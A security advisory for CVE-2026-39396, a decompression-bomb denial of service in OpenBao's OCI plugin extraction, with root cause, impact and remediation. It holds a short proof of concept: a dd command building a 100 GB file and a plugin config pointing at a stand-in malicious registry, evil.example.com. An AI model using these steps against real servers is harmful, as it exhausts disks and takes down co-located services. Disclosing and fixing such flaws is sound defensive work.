CVE-2026-39396
OpenBao: Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)
Description
### Summary `ExtractPluginFromImage()` in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file. The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature. ### Details #### Root cause `helper/pluginutil/oci/downloader.go:301`: ```go if _, copyErr := io.Copy(outFile, tarReader); copyErr != nil { ``` `io.Copy()` reads until EOF with no size limit. The tar `header.Size` field is never validated before the copy, and `mutate.Extract` decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk. ### PoC 1. Set up a malicious OCI registry 2. Create a decompression bomb binary: ```bash dd if=/dev/zero bs=1G count=100 > /tmp/bomb-binary ``` 3. Package it in a minimal OCI image 4. Push to the malicious registry 5. Configure victim OpenBao to use this registry: ```hcl plugin "secrets" "bomb" { image = "evil.example.com/plugin" version = "v1.0.0" binary_name = "openbao-plugin-secrets-bomb" sha256sum = "0000000000000000000000000000000000000000000000000000000000000000" } plugin_auto_download = true ``` 6. Start OpenBao (or trigger SIGHUP), load OCI image, disk fill -> cause DoS ### Impact - Denial of Service: Disk exhaustion on the OpenBao server - Cascading failure: Co-located services (databases, other apps) also fail when the disk is full - Difficult recovery: If the process is killed mid-extraction, the partial file remains on disk and is not cleaned up - Repeated exploitation: On SIGHUP or restart with plugin_auto_download = true, the bomb is re-downloaded ### Remediation 1. Validate `header.Size` against a configurable maximum before opening the output file 2. Wrap `tarReader` in `io.LimitReader(tarReader, maxSize+1)` and check bytes written after copy 3. Add a max_size configuration field to PluginConfig for operator control (default: 1 GiB)
How to fix CVE-2026-39396
To remediate CVE-2026-39396, upgrade the affected package to a fixed version below.
- —